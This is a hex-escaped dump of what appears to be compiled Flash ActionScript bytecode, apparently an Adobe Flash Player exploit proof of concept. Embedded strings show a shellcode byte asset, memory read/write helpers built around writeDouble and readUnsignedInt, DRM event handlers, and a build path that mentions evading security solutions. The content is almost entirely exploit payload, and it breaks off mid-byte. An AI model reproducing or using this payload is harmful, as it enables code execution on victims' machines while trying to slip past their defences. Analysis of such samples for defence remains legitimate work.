\\x66\\x4F\\xD0\\x66\\x51\\x4F\\x64\\x02\\xD0\\x66\\x51\\xD0\\x66\\x57\\x82\\x61\\x9C\\x01\\x47\\xD0\\x66\\x66\\x4F\\x67\\x00\\x47\\x00\\x00\\x05\\x04\\x04\\x05\\x0A\\x82\\x01\\xD0\\x30\\xEF\\x01\\x05\\x00\\x00\\xEF\\x01\\x76\\x01\\x00\\x57\\x2A\\xD6\\x30\\x65\\x01\\xD1\\x80\\x0F\\x6D\\x01\\x65\\x01\\x65\\x01\\x6C\\x01\\x80\\x0F\\x6D\\x01\\xD0\\x49\\x00\\xD0\\x65\\x01\\x6C\\x01\\x61\\x66\\xD0\\x4F\\x43\\x00\\x5D\\x03\\x4A\\x03\\x00\\x2C\\x78\\x4F\\xA9\\x01\\x01\\x5D\\x03\\x4A\\x03\\x00\\x2C\\x78\\x4F\\xA9\\x01\\x01\\x10\\x18\\x00\\x00\\xD0\\x30\\xD2\\x30\\x5A\\x00\\x2A\\xD7\\x2A\\x30\\x2B\\x6D\\x01\\xD0\\x5D\\x08\\x4A\\x08\\x00\\x61\\x51\\x1D\\x08\\x03\\xD0\\x5D\\x09\\x24\\x64\\x25\\xE8\\x07\\x4A\\x09\\x02\\x61\\x6E\\xD0\\x66\\x6E\\x2C\\x68\\xD0\\x66\\x6F\\x4F\\xAA\\x01\\x02\\xD0\\x66\\x6E\\x4F\\xAB\\x01\\x00\\x47\\x01\\x2F\\x45\\x49\\x05\\x6C\\x01\\x8F\\x01\\x00\\x01\\x0F\\x00\\x06\\x01\\x01\\x03\\x04\\x03\\xD0\\x30\\x47\\x00\\x00\\xBF\\x14\\x3B\\x01\\x00\\x00\\x01\\x00\\x00\\x00\\x6D\\x78\\x2F\\x63\\x6F\\x72\\x65\\x2F\\x49\\x46\\x6C\\x65\\x78\\x41\\x73\\x73\\x65\\x74\\x00\\x10\\x00\\x2E\\x00\\x00\\x00\\x00\\x0D\\x00\\x42\\x45\\x3A\\x5C\\x64\\x65\\x76\\x5C\\x34\\x2E\\x79\\x5C\\x66\\x72\\x61\\x6D\\x65\\x77\\x6F\\x72\\x6B\\x73\\x5C\\x70\\x72\\x6F\\x6A\\x65\\x63\\x74\\x73\\x5C\\x66\\x72\\x61\\x6D\\x65\\x77\\x6F\\x72\\x6B\\x5C\\x73\\x72\\x63\\x3B\\x6D\\x78\\x5C\\x63\\x6F\\x72\\x65\\x3B\\x49\\x46\\x6C\\x65\\x78\\x41\\x73\\x73\\x65\\x74\\x2E\\x61\\x73\\x1D\\x6D\\x78\\x2E\\x63\\x6F\\x72\\x65\\x3A\\x49\\x46\\x6C\\x65\\x78\\x41\\x73\\x73\\x65\\x74\\x2F\\x49\\x46\\x6C\\x65\\x78\\x41\\x73\\x73\\x65\\x74\\x07\\x6D\\x78\\x2E\\x63\\x6F\\x72\\x65\\x0A\\x49\\x46\\x6C\\x65\\x78\\x41\\x73\\x73\\x65\\x74\\x17\\x5F\\x5F\\x67\\x6F\\x5F\\x74\\x6F\\x5F\\x64\\x65\\x66\\x69\\x6E\\x69\\x74\\x69\\x6F\\x6E\\x5F\\x68\\x65\\x6C\\x70\\x03\\x70\\x6F\\x73\\x04\\x31\\x33\\x33\\x30\\x00\\x06\\x6E\\x61\\x6D\\x65\\x5F\\x31\\x06\\x6E\\x61\\x6D\\x65\\x5F\\x32\\x06\\x6E\\x61\\x6D\\x65\\x5F\\x37\\x03\\x16\\x04\\x16\\x09\\x02\\x01\\x01\\x06\\x07\\x01\\x05\\x09\\x05\\x01\\x07\\x02\\x0A\\x07\\x02\\x0B\\x07\\x02\\x0C\\x03\\x00\\x00\\x01\\x00\\x00\\x00\\x03\\x00\\x00\\x00\\x01\\x00\\x01\\x06\\x01\\x07\\x08\\x01\\x01\\x00\\x05\\x00\\x01\\x00\\x00\\x00\\x01\\x02\\x01\\x01\\x44\\x00\\x00\\x01\\x00\\x02\\x00\\x04\\x01\\x03\\x03\\x01\\x47\\x00\\x00\\x02\\x09\\x01\\x01\\x02\\x22\\x10\\x06\\x00\\x00\\x41\\x06\\x03\\x43\\x06\\x06\\xD0\\x30\\xF1\\x02\\xF0\\x23\\x5D\\x02\\x10\\x04\\x00\\x00\\x13\\x07\\x00\\x00\\x20\\x58\\x00\\x68\\x01\\xF0\\x0C\\x47\\x00\\x00\\xBF\\x14\\x64\\x02\\x00\\x00\\x01\\x00\\x00\\x00\\x6D\\x78\\x2F\\x63\\x6F\\x72\\x65\\x2F\\x42\\x79\\x74\\x65\\x41\\x72\\x72\\x61\\x79\\x41\\x73\\x73\\x65\\x74\\x00\\x10\\x00\\x2E\\x00\\x00\\x00\\x00\\x19\\x16\\x6D\\x78\\x2E\\x63\\x6F\\x72\\x65\\x3A\\x42\\x79\\x74\\x65\\x41\\x72\\x72\\x61\\x79\\x41\\x73\\x73\\x65\\x74\\x07\\x56\\x45\\x52\\x53\\x49\\x4F\\x4E\\x2A\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x77\\x77\\x77\\x2E\\x61\\x64\\x6F\\x62\\x65\\x2E\\x63\\x6F\\x6D\\x2F\\x32\\x30\\x30\\x36\\x2F\\x66\\x6C\\x65\\x78\\x2F\\x6D\\x78\\x2F\\x69\\x6E\\x74\\x65\\x72\\x6E\\x61\\x6C\\x0B\\x34\\x2E\\x36\\x2E\\x30\\x2E\\x32\\x33\\x32\\x30\\x31\\x00\\x46\\x45\\x3A\\x5C\\x64\\x65\\x76\\x5C\\x34\\x2E\\x79\\x5C\\x66\\x72\\x61\\x6D\\x65\\x77\\x6F\\x72\\x6B\\x73\\x5C\\x70\\x72\\x6F\\x6A\\x65\\x63\\x74\\x73\\x5C\\x66\\x72\\x61\\x6D\\x65\\x77\\x6F\\x72\\x6B\\x5C\\x73\\x72\\x63\\x3B\\x6D\\x78\\x5C\\x63\\x6F\\x72\\x65\\x3B\\x42\\x79\\x74\\x65\\x41\\x72\\x72\\x61\\x79\\x41\\x73\\x73\\x65\\x74\\x2E\\x61\\x73\\x25\\x6D\\x78\\x2E\\x63\\x6F\\x72\\x65\\x3A\\x42\\x79\\x74\\x65\\x41\\x72\\x72\\x61\\x79\\x41\\x73\\x73\\x65\\x74\\x2F\\x42\\x79\\x74\\x65\\x41\\x72\\x72\\x61\\x79\\x41\\x73\\x73\\x65\\x74\\x06\\x53\\x74\\x72\\x69\\x6E\\x67\\x17\\x5F\\x5F\\x67\\x6F\\x5F\\x74\\x6F\\x5F\\x64\\x65\\x66\\x69\\x6E\\x69\\x74\\x69\\x6F\\x6E\\x5F\\x68\\x65\\x6C\\x70\\x03\\x70\\x6F\\x73\\x03\\x35\\x33\\x35\\x0A\\x49\\x46\\x6C\\x65\\x78\\x41\\x73\\x73\\x65\\x74\\x07\\x6D\\x78\\x2E\\x63\\x6F\\x72\\x65\\x0E\\x42\\x79\\x74\\x65\\x41\\x72\\x72\\x61\\x79\\x41\\x73\\x73\\x65\\x74\\x0B\\x66\\x6C\\x61\\x73\\x68\\x2E\\x75\\x74\\x69\\x6C\\x73\\x09\\x42\\x79\\x74\\x65\\x41\\x72\\x72\\x61\\x79\\x06\\x4F\\x62\\x6A\\x65\\x63\\x74\\x1C\\x5F\\x5F\\x67\\x6F\\x5F\\x74\\x6F\\x5F\\x63\\x74\\x6F\\x72\\x5F\\x64\\x65\\x66\\x69\\x6E\\x69\\x74\\x69\\x6F\\x6E\\x5F\\x68\\x65\\x6C\\x70\\x04\\x33\\x33\\x39\\x30\\x04\\x32\\x38\\x39\\x39\\x00\\x06\\x6E\\x61\\x6D\\x65\\x5F\\x31\\x06\\x6E\\x61\\x6D\\x65\\x5F\\x32\\x06\\x6E\\x61\\x6D\\x65\\x5F\\x37\\x08\\x05\\x01\\x08\\x03\\x16\\x05\\x16\\x0D\\x16\\x0F\\x18\\x01\\x16\\x15\\x02\\x01\\x04\\x0B\\x07\\x02\\x02\\x07\\x03\\x08\\x09\\x0C\\x01\\x07\\x04\\x0E\\x07\\x05\\x10\\x09\\x0E\\x01\\x07\\x03\\x11\\x07\\x07\\x16\\x07\\x07\\x17\\x07\\x07\\x18\\x03\\x00\\x00\\x05\\x00\\x00\\x00\\x07\\x00\\x00\\x00\\x05\\x00\\x03\\x09\\x01\\x0A\\x0B\\x12\\x01\\x0A\\x13\\x09\\x01\\x0A\\x14\\x01\\x04\\x05\\x09\\x06\\x01\\x03\\x01\\x00\\x00\\x01\\x01\\x46\\x01\\x02\\x04\\x01\\x01\\x00\\x01\\x02\\x01\\x04\\x44\\x00\\x00\\x02\\x01\\x02\\x03\\x00\\x09\\x01\\x04\\x05\\x0E\\xD0\\x30\\xEF\\x01\\x02\\x00\\x12\\x5E\\x01\\x2C\\x04\\x68\\x01\\x47\\x00\\x00\\x01\\x08\\x01\\x05\\x06\\x10\\xF1\\x06\\xF0\\x59\\xD0\\x30\\xF1\\x06\\xF0\\x5B\\xD0\\x49\\x00\\xF0\\x5C\\x47\\x00\\x00\\x02\\x09\\x01\\x01\\x04\\x3B\\xD0\\x30\\x10\\x05\\x00\\x00\\x40\\x07\\x41\\x09\\x03\\xF1\\x06\\xF0\\x47\\x5D\\x06\\x5D\\x07\\x66\\x07\\x10\\x04\\x00\\x00\\x13\\x1D\\x00\\x00\\x30\\x5D\\x05\\x66\\x05\\x30\\x5D\\x05\\x66\\x05\\x58\\x00\\x1D\\x10\\x05\\x00\\x00\\xB1\\x44\\x01\\x12\\x29\\x1D\\x68\\x04\\xF1\\x06\\xF0\\x0C\\x47\\x00\\x00\\xBF\\x14\\xE0\\x01\\x00\\x00\\x01\\x00\\x00\\x00\\x73\\x68\\x65\\x6C\\x6C\\x63\\x6F\\x64\\x42\\x79\\x74\\x65\\x73\\x00\\x10\\x00\\x2E\\x00\\x00\\x00\\x00\\x17\\x0E\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x1D\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x2F\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x07\\x6D\\x78\\x2E\\x63\\x6F\\x72\\x65\\x0E\\x42\\x79\\x74\\x65\\x41\\x72\\x72\\x61\\x79\\x41\\x73\\x73\\x65\\x74\\x06\\x4F\\x62\\x6A\\x65\\x63\\x74\\x09\\x42\\x79\\x74\\x65\\x41\\x72\\x72\\x61\\x79\\x0B\\x66\\x6C\\x61\\x73\\x68\\x2E\\x75\\x74\\x69\\x6C\\x73\\x0C\\x45\\x78\\x63\\x6C\\x75\\x64\\x65\\x43\\x6C\\x61\\x73\\x73\\x1C\\x5F\\x5F\\x67\\x6F\\x5F\\x74\\x6F\\x5F\\x63\\x74\\x6F\\x72\\x5F\\x64\\x65\\x66\\x69\\x6E\\x69\\x74\\x69\\x6F\\x6E\\x5F\\x68\\x65\\x6C\\x70\\x03\\x70\\x6F\\x73\\x03\\x34\\x34\\x32\\x17\\x5F\\x5F\\x67\\x6F\\x5F\\x74\\x6F\\x5F\\x64\\x65\\x66\\x69\\x6E\\x69\\x74\\x69\\x6F\\x6E\\x5F\\x68\\x65\\x6C\\x70\\x03\\x33\\x37\\x31\\x00\\x06\\x6E\\x61\\x6D\\x65\\x5F\\x31\\x06\\x6E\\x61\\x6D\\x65\\x5F\\x32\\x06\\x6E\\x61\\x6D\\x65\\x5F\\x37\\x21\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x61\\x64\\x6F\\x62\\x65\\x2E\\x63\\x6F\\x6D\\x2F\\x41\\x53\\x33\\x2F\\x32\\x30\\x30\\x36\\x2F\\x62\\x75\\x69\\x6C\\x74\\x69\\x6E\\x0D\\x73\\x68\\x65\\x6C\\x6C\\x63\\x6F\\x64\\x42\\x79\\x74\\x65\\x73\\x0E\\x3A\\x73\\x68\\x65\\x6C\\x6C\\x63\\x6F\\x64\\x42\\x79\\x74\\x65\\x73\\x1C\\x3A\\x73\\x68\\x65\\x6C\\x6C\\x63\\x6F\\x64\\x42\\x79\\x74\\x65\\x73\\x2F\\x73\\x68\\x65\\x6C\\x6C\\x63\\x6F\\x64\\x42\\x79\\x74\\x65\\x73\\x0C\\x05\\x01\\x16\\x02\\x16\\x04\\x18\\x01\\x16\\x08\\x16\\x0F\\x16\\x0F\\x16\\x0F\\x08\\x13\\x05\\x15\\x18\\x15\\x03\\x01\\x02\\x01\\x06\\x0C\\x07\\x02\\x01\\x07\\x03\\x05\\x09\\x01\\x01\\x07\\x02\\x06\\x07\\x05\\x07\\x07\\x06\\x10\\x07\\x06\\x11\\x07\\x06\\x12\\x07\\x06\\x06\\x07\\x06\\x14\\x09\\x14\\x02\\x03\\x00\\x00\\x0F\\x00\\x00\\x00\\x16\\x00\\x00\\x00\\x0F\\x00\\x04\\x09\\x00\\x0A\\x01\\x0B\\x0C\\x0D\\x01\\x0B\\x0E\\x09\\x00\\x01\\x0A\\x02\\x09\\x0B\\x00\\x01\\x00\\x02\\x00\\x01\\x00\\x01\\x0A\\x44\\x01\\x00\\x01\\x03\\x03\\x00\\x02\\x01\\x01\\x05\\x17\\xD0\\x30\\x5D\\x0B\\x60\\x09\\x30\\x60\\x05\\x30\\x60\\x02\\x30\\x60\\x02\\x58\\x00\\x1D\\x1D\\x1D\\x68\\x0A\\x47\\x00\\x00\\x01\\x01\\x01\\x06\\x07\\x06\\xD0\\x30\\xD0\\x49\\x00\\x47\\x00\\x00\\x02\\x01\\x01\\x05\\x06\\x03\\xD0\\x30\\x47\\x00\\x00\\xBF\\x14\\x07\\x05\\x00\\x00\\x01\\x00\\x00\\x00\\x66\\x6C\\x61\\x73\\x68\\x33\\x00\\x10\\x00\\x2E\\x00\\x0C\\x11\\x22\\x33\\x44\\x55\\x66\\x77\\x88\\x01\\x99\\x01\\xAA\\x01\\xBB\\x01\\x00\\x00\\x46\\x02\\x1E\\x16\\x00\\x3B\\x43\\x3A\\x5C\\x55\\x73\\x65\\x72\\x73\\x5C\\x4D\\x69\\x68\\x61\\x5C\\x41\\x64\\x6F\\x62\\x65\\x4D\\x69\\x6E\\x65\\x50\\x6F\\x43\\x5F\\x74\\x72\\x79\\x69\\x6E\\x67\\x54\\x6F\\x45\\x76\\x61\\x64\\x65\\x53\\x65\\x63\\x53\\x6F\\x6C\\x75\\x74\\x69\\x6F\\x6E\\x73\\x66\\x6C\\x61\\x33\\x2E\\x61\\x73\\x03\\x61\\x31\\x32\\x0D\\x66\\x6C\\x61\\x73\\x68\\x33\\x2F\\x66\\x6C\\x61\\x73\\x68\\x33\\x05\\x5F\\x6C\\x6F\\x63\\x5F\\x03\\x61\\x31\\x33\\x06\\x4E\\x75\\x6D\\x62\\x65\\x72\\x07\\x66\\x6C\\x61\\x73\\x68\\x32\\x37\\x06\\x4F\\x62\\x6A\\x65\\x63\\x74\\x0E\\x66\\x6C\\x61\\x73\\x68\\x33\\x2F\\x66\\x6C\\x61\\x73\\x68\\x32\\x35\\x06\\x70\\x61\\x72\\x61\\x6D\\x31\\x05\\x70\\x61\\x72\\x6D\\x32\\x01\\x61\\x03\\x6C\\x6F\\x77\\x0D\\x66\\x6C\\x61\\x73\\x68\\x33\\x2E\\x61\\x73\\x24\\x31\\x30\\x39\\x21\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x61\\x64\\x6F\\x62\\x65\\x2E\\x63\\x6F\\x6D\\x2F\\x41\\x53\\x33\\x2F\\x32\\x30\\x30\\x36\\x2F\\x62\\x75\\x69\\x6C\\x74\\x69\\x6E\\x15\\x66\\x6C\\x61\\x73\\x68\\x2E\\x75\\x74\\x69\\x6C\\x73\\x3A\\x42\\x79\\x74\\x65\\x41\\x72\\x72\\x61\\x79\\x02\\x68\\x69\\x0E\\x66\\x6C\\x61\\x73\\x68\\x33\\x2F\\x66\\x6C\\x61\\x73\\x68\\x32\\x36\\x04\\x76\\x6F\\x69\\x64\\x03\\x69\\x6E\\x74\\x08\\x70\\x6F\\x73\\x69\\x74\\x69\\x6F\\x6E\\x0B\\x77\\x72\\x69\\x74\\x65\\x44\\x6F\\x75\\x62\\x6C\\x65\\x0F\\x72\\x65\\x61\\x64\\x55\\x6E\\x73\\x69\\x67\\x6E\\x65\\x64\\x49\\x6E\\x74\\x0E\\x66\\x6C\\x61\\x73\\x68\\x33\\x2F\\x66\\x6C\\x61\\x73\\x68\\x32\\x37\\x02\\x61\\x31\\x04\\x75\\x69\\x6E\\x74\\x17\\x5F\\x5F\\x67\\x6F\\x5F\\x74\\x6F\\x5F\\x64\\x65\\x66\\x69\\x6E\\x69\\x74\\x69\\x6F\\x6E\\x5F\\x68\\x65\\x6C\\x70\\x03\\x70\\x6F\\x73\\x03\\x31\\x30\\x34\\x02\\x61\\x32\\x03\\x31\\x32\\x39\\x02\\x61\\x33\\x03\\x31\\x35\\x34\\x02\\x61\\x34\\x03\\x31\\x37\\x39\\x02\\x61\\x35\\x03\\x32\\x30\\x34\\x02\\x61\\x36\\x03\\x32\\x32\\x39\\x02\\x61\\x37\\x03\\x32\\x35\\x34\\x02\\x61\\x38\\x03\\x32\\x37\\x39\\x02\\x61\\x39\\x03\\x33\\x30\\x34\\x03\\x61\\x31\\x30\\x03\\x33\\x32\\x39\\x03\\x61\\x31\\x31\\x03\\x33\\x35\\x35\\x03\\x33\\x38\\x31\\x03\\x34\\x30\\x30\\x07\\x66\\x6C\\x61\\x73\\x68\\x32\\x35\\x03\\x35\\x30\\x37\\x07\\x66\\x6C\\x61\\x73\\x68\\x32\\x36\\x03\\x36\\x32\\x39\\x03\\x37\\x37\\x36\\x0B\\x66\\x6C\\x61\\x73\\x68\\x2E\\x75\\x74\\x69\\x6C\\x73\\x09\\x42\\x79\\x74\\x65\\x41\\x72\\x72\\x61\\x79\\x1C\\x5F\\x5F\\x67\\x6F\\x5F\\x74\\x6F\\x5F\\x63\\x74\\x6F\\x72\\x5F\\x64\\x65\\x66\\x69\\x6E\\x69\\x74\\x69\\x6F\\x6E\\x5F\\x68\\x65\\x6C\\x70\\x03\\x34\\x33\\x35\\x02\\x36\\x38\\x00\\x06\\x6E\\x61\\x6D\\x65\\x5F\\x31\\x06\\x6E\\x61\\x6D\\x65\\x5F\\x32\\x06\\x6E\\x61\\x6D\\x65\\x5F\\x37\\x07\\x4D\\x65\\x6D\\x5F\\x41\\x72\\x72\\x07\\x4D\\x65\\x6D\\x5F\\x41\\x72\\x72\\x1B\\x05\\x01\\x17\\x02\\x16\\x02\\x05\\x10\\x08\\x11\\x18\\x01\\x1A\\x01\\x1A\\x12\\x16\\x3B\\x16\\x40\\x16\\x40\\x17\\x40\\x16\\x40\\x16\\x40\\x16\\x40\\x16\\x40\\x16\\x40\\x16\\x40\\x16\\x40\\x16\\x40\\x16\\x40\\x16\\x40\\x16\\x40\\x16\\x40\\x16\\x40\\x16\\x40\\x04\\x08\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x01\\x03\\x08\\x01\\x0C\\x0A\\x04\\x05\\x06\\x07\\x08\\x31\\x07\\x02\\x04\\x07\\x02\\x07\\x07\\x03\\x08\\x07\\x03\\x09\\x07\\x03\\x0A\\x09\\x0F\\x01\\x1B\\x01\\x09\\x13\\x01\\x07\\x03\\x15\\x07\\x03\\x16\\x07\\x03\\x17\\x07\\x03\\x18\\x07\\x03\\x19\\x07\\x02\\x1B\\x07\\x03\\x1C\\x07\\x02\\x20\\x07\\x02\\x22\\x07\\x02\\x24\\x07\\x02\\x26\\x07\\x02\\x28\\x07\\x02\\x2A\\x07\\x02\\x2C\\x07\\x02\\x2E\\x07\\x02\\x30\\x07\\x02\\x32\\x07\\x03\\x36\\x07\\x03\\x38\\x07\\x03\\x44\\x07\\x09\\x3C\\x09\\x45\\x02\\x07\\x0A\\x41\\x07\\x0A\\x42\\x07\\x0A\\x43\\x07\\x0C\\x04\\x07\\x0A\\x36\\x07\\x0A\\x0A\\x07\\x0C\\x07\\x07\\x0A\\x08\\x07\\x0A\\x09\\x07\\x0A\\x38\\x07\\x0A\\x16\\x07\\x0A\\x15\\x09\\x0F\\x03\\x1B\\x03\\x09\\x13\\x03\\x07\\x0A\\x17\\x07\\x0A\\x18\\x07\\x0A\\x19\\x06\\x00\\x00\\x02\\x00\\x00\\x00\\x05\\x00\\x00\\x24\\x0B\\x00\\x02\\x2A\\x29\\x24\\x14\\x80\\x0C\\x0D\\x01\\x24\\x26\\x1A\\x80\\x0C\\x00\\x00\\x02\\x00\\x12\\x1D\\x01\\x1E\\x1F\\x1D\\x01\\x1E\\x21\\x1D\\x01\\x1E\\x23\\x1D\\x01\\x1E\\x25\\x1D\\x01\\x1E\\x27\\x1D\\x01\\x1E\\x29\\x1D\\x01\\x1E\\x2B\\x1D\\x01\\x1E\\x2D\\x1D\\x01\\x1E\\x2F\\x1D\\x01\\x1E\\x31\\x1D\\x01\\x1E\\x33\\x1D\\x01\\x1E\\x34\\x1D\\x01\\x1E\\x35\\x1D\\x01\\x1E\\x37\\x1D\\x01\\x1E\\x39\\x1D\\x01\\x1E\\x3A\\x3D\\x01\\x1E\\x3E\\x1D\\x01\\x1E\\x3F\\x01\\x1C\\x1D\\x08\\x06\\x00\\x01\\x10\\x0E\\x40\\x00\\x0F\\x01\\x03\\x01\\x00\\x10\\x40\\x00\\x0F\\x02\\x03\\x01\\x01\\x11\\x40\\x00\\x0F\\x03\\x03\\x01\\x02\\x12\\x40\\x00\\x0F\\x04\\x03\\x01\\x03\\x13\\x40\\x00\\x0F\\x05\\x03\\x01\\x04\\x14\\x40\\x00\\x0F\\x06\\x03\\x01\\x05\\x15\\x40\\x00\\x0F\\x07\\x03\\x01\\x06\\x16\\x40\\x00\\x0F\\x08\\x03\\x01\\x07\\x17\\x40\\x00\\x0F\\x09\\x03\\x01\\x08\\x18\\x40\\x00\\x0F\\x0A\\x03\\x01\\x09\\x19\\x40\\x00\\x0F\\x0B\\x03\\x01\\x0A\\x01\\x40\\x00\\x05\\x00\\x01\\x0B\\x02\\x40\\x00\\x05\\x00\\x01\\x0C\\x23\\x41\\x00\\x02\\x01\\x0D\\x28\\x41\\x00\\x03\\x01\\x0E\\x27\\x41\\x00\\x04\\x01\\x0F\\x00\\x00\\x01\\x05\\x01\\x1C\\x44\\x00\\x00\\x02\\x10\\x11\\x06\\x00\\x08\\x01\\x04\\x05\\x03\\xD0\\x30\\x47\\x00\\x00\\x01\\x09\\x01\\x05\\x06\\x12\\xF0\\x15\\xD0\\x30\\xF0\\x16\\xD0\\x49\\x00\\xF0\\x17\\xD0\\xD0\\x68\\x22\\xF0\\x18\\x47\\x00\\x00\\x02\\x0A\\x02\\x05\\x06\\x1C\\xD0\\x30\\xEF\\x01\\x06\\x00\\x1C\\xF0\\x1C\\xD0\\xD0\\x66\\x25\\x5D\\x26\\x66\\x26\\x87\\x46\\x27\\x01\\x80\\x24\\xD5\\xF0\\x1D\\xD1\\x48\\x00\\x00\\x03\\x0B\\x03\\x05\\x06\\x2B\\xD0\\x30\\xEF\\x01\\x0C\\x00\\x20\\xEF\\x01\\x0D\\x01\\x20\\xF0\\x22\\xD0\\x2C\\x0E\\xD1\\x2A\\xC0\\x73\\xD5\\xA0\\xD2\\x66\\x2B\\x61\\x2C\\xF0\\x23\\xD0\\x2C\\x0E\\xD1\\xA0\\xD2\\x66\\x2D\\x61\\x2C\\xF0\\x24\\x47\\x00\\x00\\x04\\x0B\\x02\\x05\\x06\\x30\\xD0\\x30\\xEF\\x01\\x0C\\x00\\x26\\xF0\\x28\\xD0\\x24\\x00\\x61\\x2E\\xF0\\x29\\xD0\\xD1\\x46\\x2F\\x01\\x29\\xD0\\x24\\x00\\x61\\x2E\\x2C\\x13\\xF0\\x2C\\x70\\xD0\\x46\\x30\\x00\\x2C\\x0F\\xF0\\x2D\\x70\\xD0\\x46\\x30\\x00\\x55\\x02\\x48\\x00\\x00\\x05\\x09\\x01\\x01\\x04\\x3E\\x10\\x06\\x00\\x00\\x41\\x0A\\x44\\x08\\x0A\\x03\\xD0\\x30\\xF1\\x03\\xF0\\x05\\x5D\\x1E\\x10\\x04\\x00\\x00\\x16\\x23\\x00\\x00\\x5D\\x05\\x66\\x05\\x30\\x5D\\x1D\\x66\\x1D\\x30\\x27\\x12\\x06\\x00\\x00\\x47\\x1D\\x4F\\x01\\x18\\x03\\x5D\\x1D\\x66\\x1D\\x58\\x00\\x1D\\x1D\\x68\\x1C\\xF1\\x03\\xF0\\x03\\x47\\x00\\x00\\xBF\\x14\\x99\\x06\\x00\\x00\\x01\\x00\\x00\\x00\\x66\\x6C\\x61\\x73\\x68\\x31\\x00\\x10\\x00\\x2E\\x00\\x0B\\x91\\x22\\xA2\\x44\\xB3\\x66\\xC4\\x88\\x01\\xD5\\xAA\\x01\\xE6\\xCC\\x01\\xF7\\xEE\\x01\\x88\\x91\\x02\\x99\\xB3\\x02\\xAA\\xD5\\x02\\x00\\x00\\x71\\x02\\x1E\\x1D\\x00\\x3B\\x43\\x3A\\x5C\\x55\\x73\\x65\\x72\\x73\\x5C\\x4D\\x69\\x68\\x61\\x5C\\x41\\x64\\x6F\\x62\\x65\\x4D\\x69\\x6E\\x65\\x50\\x6F\\x43\\x5F\\x74\\x72\\x79\\x69\\x6E\\x67\\x54\\x6F\\x45\\x76\\x61\\x64\\x65\\x53\\x65\\x63\\x53\\x6F\\x6C\\x75\\x74\\x69\\x6F\\x6E\\x73\\x66\\x6C\\x61\\x31\\x2E\\x61\\x73\\x0D\\x66\\x6C\\x61\\x73\\x68\\x31\\x2F\\x66\\x6C\\x61\\x73\\x68\\x31\\x01\\x61\\x06\\x66\\x6C\\x61\\x73\\x68\\x34\\x16\\x6F\\x6E\\x44\\x52\\x4D\\x4F\\x70\\x65\\x72\\x61\\x74\\x69\\x6F\\x6E\\x43\\x6F\\x6D\\x70\\x6C\\x65\\x74\\x65\\x07\\x66\\x6C\\x61\\x73\\x68\\x32\\x38\\x1D\\x66\\x6C\\x61\\x73\\x68\\x31\\x2F\\x6F\\x6E\\x44\\x52\\x4D\\x4F\\x70\\x65\\x72\\x61\\x74\\x69\\x6F\\x6E\\x43\\x6F\\x6D\\x70\\x6C\\x65\\x74\\x65\\x04\\x76\\x6F\\x69\\x64\\x06\\x70\\x61\\x72\\x61\\x6D\\x31\\x06\\x70\\x61\\x72\\x61\\x6D\\x32\\x06\\x70\\x61\\x72\\x61\\x6D\\x33\\x06\\x70\\x61\\x72\\x61\\x6D\\x34\\x0A\\x6F\\x6E\\x44\\x52\\x4D\\x45\\x72\\x72\\x6F\\x72\\x11\\x66\\x6C\\x61\\x73\\x68\\x31\\x2F\\x6F\\x6E\\x44\\x52\\x4D\\x45\\x72\\x72\\x6F\\x72\\x04\\x75\\x69\\x6E\\x74\\x06\\x53\\x74\\x72\\x69\\x6E\\x67\\x1C\\x44\\x52\\x4D\\x4F\\x70\\x65\\x72\\x61\\x74\\x69\\x6F\\x6E\\x43\\x6F\\x6D\\x70\\x6C\\x65\\x74\\x65\\x4C\\x69\\x73\\x74\\x65\\x6E\\x65\\x72\\x19\\x63\\x6F\\x6D\\x2E\\x61\\x64\\x6F\\x62\\x65\\x2E\\x74\\x76\\x73\\x64\\x6B\\x2E\\x6D\\x65\\x64\\x69\\x61\\x63\\x6F\\x72\\x65\\x02\\x61\\x31\\x17\\x5F\\x5F\\x67\\x6F\\x5F\\x74\\x6F\\x5F\\x64\\x65\\x66\\x69\\x6E\\x69\\x74\\x69\\x6F\\x6E\\x5F\\x68\\x65\\x6C\\x70\\x03\\x70\\x6F\\x73\\x03\\x31\\x35\\x32\\x02\\x61\\x32\\x03\\x31\\x38\\x31\\x02\\x61\\x33\\x03\\x32\\x31\\x30\\x02\\x61\\x34\\x03\\x32\\x33\\x39\\x02\\x61\\x35\\x03\\x32\\x36\\x38\\x02\\x61\\x36\\x03\\x32\\x39\\x37\\x02\\x61\\x37\\x03\\x33\\x32\\x36\\x02\\x61\\x38\\x03\\x33\\x35\\x35\\x02\\x61\\x39\\x03\\x33\\x38\\x34\\x03\\x61\\x31\\x30\\x03\\x34\\x31\\x33\\x03\\x61\\x31\\x31\\x03\\x34\\x34\\x33\\x03\\x61\\x31\\x32\\x03\\x34\\x37\\x33\\x03\\x61\\x31\\x33\\x03\\x35\\x30\\x33\\x03\\x61\\x31\\x34\\x03\\x35\\x33\\x33\\x03\\x61\\x31\\x35\\x03\\x35\\x36\\x33\\x03\\x61\\x31\\x36\\x03\\x35\\x39\\x33\\x03\\x61\\x31\\x37\\x03\\x36\\x32\\x33\\x03\\x61\\x31\\x38\\x03\\x36\\x35\\x33\\x03\\x61\\x31\\x39\\x03\\x36\\x38\\x33\\x03\\x61\\x32\\x30\\x03\\x37\\x31\\x33\\x03\\x61\\x32\\x31\\x03\\x37\\x34\\x33\\x03\\x61\\x32\\x32\\x03\\x37\\x37\\x33\\x03\\x61\\x32\\x33\\x03\\x38\\x30\\x33\\x03\\x61\\x32\\x34\\x03\\x38\\x33\\x33\\x03\\x61\\x32\\x35\\x03\\x38\\x36\\x33\\x03\\x61\\x32\\x36\\x03\\x38\\x39\\x33\\x03\\x61\\x32\\x37\\x03\\x39\\x32\\x33\\x03\\x61\\x32\\x38\\x03\\x39\\x35\\x33\\x03\\x61\\x32\\x39\\x03\\x39\\x38\\x33\\x03\\x61\\x33\\x30\\x04\\x31\\x30\\x31\\x33\\x03\\x61\\x33\\x31\\x04\\x31\\x30\\x34\\x33\\x03\\x61\\x33\\x32\\x04\\x31\\x30\\x37\\x33\\x03\\x61\\x33\\x33\\x04\\x31\\x31\\x30\\x33\\x03\\x61\\x33\\x34\\x04\\x31\\x31\\x33\\x33\\x03\\x61\\x33\\x35\\x0